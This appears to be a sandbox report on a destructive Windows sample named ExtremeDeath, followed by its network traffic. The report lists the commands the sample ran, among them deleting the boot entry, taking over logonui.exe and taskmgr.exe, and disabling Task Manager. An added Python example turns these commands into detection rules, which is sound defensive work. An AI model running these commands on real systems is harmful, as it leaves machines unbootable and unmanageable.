"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\3000.tmp\3001.bat "C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe""
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current}
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe
TrashMBR.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im logonui.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\logonui.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\logonui.exe /grant Admin:F
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\logonui.exe /grant "everyone":F
C:\Windows\system32\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\taskmgr.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\taskmgr.exe /grant Admin:F
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\taskmgr.exe /grant "everyone":F
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\beeper.exe
beeper.exe
C:\Windows\system32\timeout.exe
timeout 1 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe
MouseError.exe
C:\Windows\system32\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe
MouseWarning.exe
C:\Windows\system32\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe
MouseAppIcon.exe
C:\Windows\system32\timeout.exe
timeout 10 /nobreak
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1888 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe
PlgBlt.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MouseError.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MouseWarning.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MouseAppIcon.exe
C:\Windows\system32\timeout.exe
timeout 1 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe
MouseError.exe
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe
MouseWarning.exe
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe
MouseAppIcon.exe
C:\Windows\system32\timeout.exe
timeout 15 /nobreak
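The process list above is effectively the dropped 3001.bat played back step by step: delete the current boot entry, kill and take over logonui.exe and taskmgr.exe, set DisableTaskMgr, then loop the cursor-spamming executables with timeout delays. The following is an added example, not part of the sandbox report or of the sample: command-line detection rules applied to those lines, with a correlation check that only fires when the boot-entry deletion, the system32 takeover and the Task Manager policy change appear in the same process tree. The sample input is copied from the Processes section, with two constructed benign lines appended to show the rules ignore ordinary use of the same tools; the rule names and the chain definition are this example's own, not signature names from the report.

```python
"""Command-line detection rules for the behaviour chain shown in the report.

This is an added example; it is not part of the sandbox report or the sample.
REPORT_CMDLINES is copied from the Processes section, with two constructed
benign lines appended. Rule names and the wiper-chain definition are this
example's own choices, not signature names from the report.
"""
import re
from collections import Counter

REPORT_CMDLINES = [
    # Copied from the report's Processes section.
    r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\3000.tmp\3001.bat "C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe""',
    "cscript prompt.vbs",
    "bcdedit /delete {current}",
    "TrashMBR.exe",
    "taskkill /f /im logonui.exe",
    "wmic process where name='logonui.exe' delete /nointeractive",
    r"takeown /f C:\Windows\system32\logonui.exe",
    r"icacls C:\Windows\system32\logonui.exe /grant Admin:F",
    r'icacls C:\Windows\system32\logonui.exe /grant "everyone":F',
    "taskkill /f /im taskmgr.exe",
    "wmic process where name='taskmgr.exe' delete /nointeractive",
    r"takeown /f C:\Windows\system32\taskmgr.exe",
    r"icacls C:\Windows\system32\taskmgr.exe /grant Admin:F",
    r'icacls C:\Windows\system32\taskmgr.exe /grant "everyone":F',
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    "timeout 1 /nobreak",
    "timeout 5 /nobreak",
    # Constructed benign lines (not from the report): the rules must not fire on these.
    r"icacls C:\Users\Admin\Documents\report.docx /grant Admin:R",
    "bcdedit /enum",
]

SYS32 = r"\\windows\\system32\\"   # literal \Windows\system32\ inside a regex

RULES = [
    # Deleting the running boot entry leaves the OS unbootable (Inhibit System Recovery).
    ("bcdedit_delete_boot_entry", re.compile(r"\bbcdedit(\.exe)?\b.*\s/delete\b", re.I)),
    # Killing LogonUI / Task Manager via taskkill or WMIC (Impair Defenses).
    ("kill_logon_or_taskmgr", re.compile(r"\b(taskkill|wmic)\b.*\b(logonui|taskmgr)\.exe\b", re.I)),
    # Taking ownership of a binary under system32 (Permissions Modification).
    ("takeown_system32", re.compile(r"\btakeown(\.exe)?\b.*" + SYS32, re.I)),
    # Granting full control on a system32 binary to any principal.
    ("icacls_full_control_system32", re.compile(r"\bicacls(\.exe)?\b.*" + SYS32 + r".*/grant\b.*:F\b", re.I)),
    # Worse: full control for Everyone (fires in addition to the rule above).
    ("icacls_everyone_full_control", re.compile(r'\bicacls(\.exe)?\b.*/grant\s+"?everyone"?:F\b', re.I)),
    # HKCU ...\Policies\System\DisableTaskMgr = 1 (Modify Registry).
    ("reg_disable_taskmgr", re.compile(r"\breg(\.exe)?\s+add\b.*policies\\system\b.*\bDisableTaskMgr\b.*/d\s+1\b", re.I)),
    # timeout N /nobreak used as a delay between payload stages.
    ("timeout_nobreak_delay", re.compile(r"\btimeout(\.exe)?\s+\d+\s+/nobreak\b", re.I)),
    # cmd /c running a .bat dropped under a Temp directory.
    ("cmd_runs_bat_from_temp", re.compile(r'\bcmd\.exe"?\s+/c\b.*\\temp\\.*\.bat\b', re.I)),
]

# Rules that together describe the destructive chain in this report.
WIPER_CHAIN = {"bcdedit_delete_boot_entry", "takeown_system32", "reg_disable_taskmgr"}


def match_rules(cmdline: str) -> list[str]:
    """Names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def analyze(cmdlines):
    """Return (hits, per_rule_counts) over a list of command lines."""
    hits = [(name, c) for c in cmdlines for name in match_rules(c)]
    return hits, Counter(name for name, _ in hits)


def wiper_chain_detected(cmdlines) -> bool:
    """True when every rule in WIPER_CHAIN fired at least once in the same process tree."""
    _, counts = analyze(cmdlines)
    return WIPER_CHAIN <= set(counts)


if __name__ == "__main__":
    hits, counts = analyze(REPORT_CMDLINES)
    for name, c in hits:
        print(f"{name:32} {c}")
    print("wiper chain:", wiper_chain_detected(REPORT_CMDLINES))
```

Individually, `takeown`, `icacls /grant ...:F` and `timeout /nobreak` are common in administration scripts, which is why the chain check, not any single rule, is the alert-worthy condition; in an EDR the grouping key would be the parent cmd.exe rather than a flat list.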
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
Files